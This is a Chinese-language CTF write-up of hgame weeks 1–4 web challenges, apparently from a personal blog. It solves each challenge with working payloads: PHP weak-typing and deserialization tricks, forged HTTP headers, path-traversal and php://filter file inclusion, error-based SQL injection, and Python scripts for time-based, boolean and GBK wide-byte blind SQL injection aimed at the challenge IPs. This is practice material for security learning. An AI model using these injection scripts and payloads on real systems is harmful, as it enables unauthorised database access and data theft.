hgame week周
Feb 22, 2018 09:54 · 621 words · 3 minute read
年终于过完了。
week1
Are you from Europe?
查看源码,得到一串加密的js,解密后得到flag
hgame{Th3_Ch0seN_0nE!}
special number
题目给出源码,可以想到php中的弱类型0==“任意字符” json_decode函数在处理数字时,不会做处理。正则里又限制有字母,可联想到0e4564654654 payload
http://118.25.18.223:10001/?key=0e4564654654
hgame{pHp_w34k_typing_s000_e4sy}
can u find me?
提示robot,查看robots.txt,发现f1aaaaaaaag.php文件,访问,又提示只有admin才可以查看,于是抓包将user改为admin即可。
hgame{78e01ee77a39ef4e}
tell me what you want
对数据包的修改,最后的数据包
POST /index.php HTTP/1.1
Host: 123.206.203.108:10001
User-Agent: please use Icefox/57.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 9
Cookie: isadmin=1
Connection: close
Upgrade-Insecure-Requests: 1
X-Forwarded-For: 127.0.0.1
referer: www.google.com
want=flag
hgame{For9e_hTTp_iS_N0T_HArd}
我们不一样
php弱类型比较,strcmp()函数比较一个数组和字符串时会返回null payload
http://118.25.18.223:10002/index.php
post:
str1=jshdka&str2[]=sjdak
hgame{g3t_f14g_is_so0000_ez}
week2
Random?
提示有vim编辑文件,还说网不好,尝试备份文件文件泄露,得到源码
<?php
error_reporting(0);
include ('flag.php');
class emmm
{
var $public;
var $secret;
}
if ($_GET['emmm']) {
$emmm = unserialize($_GET['emmm']);
if (!is_object($emmm)) {
die("error");
}
$emmm->public = random_int(0, 100000000);
$emmm->secret = random_int(0, 100000000);
if ($emmm->public == $emmm->secret) {
echo $flag;
}
}
#highlight_file(__FILE__);
?>
南邮ctf里的反序列出过这个,构造数据
class emmm
{
var $public;
var $secret;
}
$emmm = new emmm();
$emmm->public=&$emmm->secret;
echo serialize($emmm);
//O:4:"emmm":2:{s:6:"public";N;s:6:"secret";R:2;}
\$emmm->public=&\$emmm->secret;是将两个变量指向同一个地址。
hgame{&_Is_wondeRful!@#}
草莓社区-1
http://118.25.18.223:10011/show_maopian.php?mao=../flag.php
hgame{#Ma0_pi4n_haO_k4n_ma#}
草莓社区-2
点开发现url是这样的
http://118.25.18.223:10012/show_maopian.php?mao=2.jpg
感觉是文件包含,payload
http://118.25.18.223:10012/show_maopian.php?mao=php://filter/read=convert.base64-encode/resource=../flag.php
F12查看源码,得到flag
hgame{!m4o_pi4n_ChaO_hao_kan!}
最简单的sql题
万能密码即可
hgame{@s0ng_fen_ti@}
week3
正常的SQLi
题目有源码泄露。index.php.bak
<?php
.....
$username = base64_decode($_COOKIE['name']);
.....
$sql = "select * from user where username = '{$username}'";
$re = mysqli_query($conn, $sql);
$rs = mysqli_fetch_array($re);
// echo $rs['flag'];
echo $username . '<br/>';
echo "因为出题人太懒了,所以现在没有任何功能";
.....
时间盲注脚本
import base64
import requests
def url(payload):
url = "http://123.206.203.108:10010/normalSQLi/index.php"
headers = {
'Cookie': 'name='+str(payload)+'; isadmin=0'
}
r = requests.post(url,headers=headers,timeout=4)
def tryy(payload):
try:
url(payload)
except Exception as e:
return 1
else:
return 0
flag = ''
for mid in range(1,70):
min1 = 0
max1 = 255
while 1:
middle = int((min1+max1)/2)
#pa = "admin' or if((ascii(mid((select group_concat(table_name) from information_schema.tables where table_schema=database()),"+str(mid)+",1))>"+str(middle)+"),sleep(5),0) # "
#pa = "admin' or if((ascii(mid((select group_concat(column_name) from information_schema.columns where table_name='user'),"+str(mid)+",1))>"+str(middle)+"),sleep(5),0) # "
pa = "admin' or if((ascii(mid((select group_concat(flag) from user),"+str(mid)+",1))>"+str(middle)+"),sleep(5),0) # "
payload = str(base64.b64encode(pa.encode('utf-8')),'utf-8')
time = tryy(payload)
if time==1:
min1 = middle
if time==0:
max1 = middle
if min1+1==max1:
flag = flag + chr(max1)
print(flag)
break
print(flag)
这里有一个自己以前没注意的小细节,导致在爆列名时候一直出错。 就是在使用if(表达式,sleep(5),0)时,最好给表达式添加上括号(或者在表达式前后加上空格),否则会在使用where=“时无法注出数据,但是如果where后不使用单引号,那么不影响注入。即
#注入正常
pa = "admin' or if(ascii(mid((select group_concat(table_name) from information_schema.tables where table_schema=database()),"+str(mid)+",1))>"+str(middle)+",sleep(5),0) # "
#注入正常
pa = "admin' or if((ascii(mid((select group_concat(table_name) from information_schema.tables where table_schema='user'),"+str(mid)+",1))>"+str(middle)+"),sleep(5),0) # "
#注入失败
pa = "admin' or if(ascii(mid((select group_concat(table_name) from information_schema.tables where table_schema='user'),"+str(mid)+",1))>"+str(middle)+",sleep(5),0) # "
flag
hgame{fLag_1s_h4re.....}
送分的SQLi
报错注入 payload
http://118.25.18.223:10068/?id=1 and updatexml(1,concat(0x7e,(select mid(f111aaaggg_w3,10,30) from f111aa4g),0x7e),1); #
hgame{Th3_e4sist_sql_injeCti0n##}
简单的SQLi
添加了MD5截断验证的bool盲注。
import hashlib
import requests
import re
def md5(str1):
return hashlib.md5(str1.encode('utf-8')).hexdigest()
def code_md5(str1):
i=1
while 1:
if md5(str(i))[4:8]==str(str1) :
return i;
# print(md5(str(i)))
# print(i)
break
else:
i+=1
def url(mid,asc,code1):
global code
#url = "http://118.25.18.223:10086/index.php?id=1\' and ascii(mid((select database()),%s,1))>%s --+&code=%s"%(mid,asc,code1) #week3_sqli1
#url = "http://118.25.18.223:10086/index.php?id=1\' and ascii(mid((select group_concat(table_name) from information_schema.tables where table_schema=database()),%s,1))>%s --+&code=%s"%(mid,asc,code1) #users,w3_fllllllll4ag
#url = "http://118.25.18.223:10086/index.php?id=1\' and ascii(mid((select group_concat(column_name) from information_schema.columns where table_name='w3_fllllllll4ag'),%s,1))>%s --+&code=%s"%(mid,asc,code1) #dajiangyoude,haishijiangyou,f111144g_w3_sqli1
url = "http://118.25.18.223:10086/index.php?id=1\' and ascii(mid((select group_concat(f111144g_w3_sqli1) from w3_fllllllll4ag),%s,1))>%s --+&code=%s"%(mid,asc,code1)
cookie = {"PHPSESSID":"0cecc18815650852c2f7e718a3d5bff9"}
content = requests.get(url,cookies=cookie)
md5_4 = re.findall(':="(.*)"',content.text)
code = code_md5(md5_4[0])
#print(content.text)
if "query false" in content.text:
return 0
if "query ok" in content.text:
return 1
else:
return 2
flag=''
code = 'sdsd'
for mid in range(1,50):
min1 = 0
max1 = 255
while 1:
middle = int((min1+max1)/2)
asc = str(middle)
# print(asc)
# print(url(mid,asc,code))
if url(mid,asc,code)==1:
min1 = middle
if url(mid,asc,code)==0:
max1 = middle
if min1+1==max1:
flag+=chr(max1)
print(flag)
break
hgame{sql_Injection_s000oo_fun}
week4
又双叒叕是SQLI
index.php~拿到源码
<?php
error_reporting(0);
include("sql.php");
$waf="/(sleep|benchmark|union|group by|=|>|<|hex| |lower|strcmp|updatexml|xmlelement|extractvalue|concat|bin|sleep|mid\(|substr|left|ascii|\/\*|\*\/)/i";
if(isset($_GET['user'])){
if(preg_match_all($waf,$_GET['user'])!=0){
$user="admin";
}else{
$user = str_replace("'","\'",$_GET['user']);
}
//echo $user."<br>";
$sqli = new mysqli($host,$username,$passwd,$database);
$sqli->set_charset("gbk");
$query="select * from users where username='".$user."'";
$result = $sqli->query($query);
//echo $sqli->error;
$num=0;
@$num = $result->num_rows;
if($num>0){
while($row = $result->fetch_row()){
echo $row[0]." ".$row[1]." ".$row[2]."<br>";
}
}
}
?>
盲注脚本
import requests
import string
url = 'http://118.25.18.223:10088/?user='
test="0123456789"+string.ascii_letters+"!@#$^&*(){}=+`~_|"
# payload = '%%df%%27 or (select database() like \"%s%%\")'%(test)
# #payload = ' or (select database() like %s%% )'%(test)
# print(payload)
flag=''
for x in range(1,50):
for x in test:
#payload = '%%df%%27%%0aor%%0a(select%%0adatabase()%%0alike%%0a\"%s%%\")%%23'%(flag+x) # week44sqliii
#payload = '%%df%%27%%0aor%%0a((select%%0atable_name%%0afrom%%0ainformation_schema.tables%%0awhere%%0atable_schema%%0alike%%0adatabase()%%0alimit%%0a0,1)%%0alike%%0a\"%s%%\")%%23'%(flag+x) #flllllag,users
#payload = '%%df%%27%%0aor%%0a((select%%0acolumn_name%%0afrom%%0ainformation_schema.columns%%0awhere%%0atable_name%%0alike%%0a"flllllag"%%0alimit%%0a1,1)%%0alike%%0a\"%s%%\")%%23'%(flag+x) #notflag,thisisflag
payload = '%%df%%27%%0aor%%0a((select%%0athisisflag%%0afrom%%0aflllllag%%0alimit%%0a0,1)%%0alike%%0a\"%s%%\")%%23'%(flag+x) #hgame{like!injection!so!g00d__}
url1 = url+payload
r = requests.get(url1)
if '998' in r.text:
flag+=x
print(flag)
break
一个小知识点
使用宽字节进行盲注的时候,如果where语句的字段时字符型的时候,只能使用of,不可以使用and,因为使用and的时候,判断的依据是前面的语句是否查询出内容,如果判断是类型是字符型,宽字节的%df,字符也会进行比较,所以就算是闭合了单引号,但是是查不出东西的,但是如果判断的字段类型是int类型的话,就可以查出内容,因为mysql在比较的时候如果被比较的内容不是整型,那么mysql会自动将内容转换为整型。即 1a=1,是成立的。
select * from hgame where name='admin�\' order by 1#' #name为varchar类型,则查不出内容,如果是int类型就可以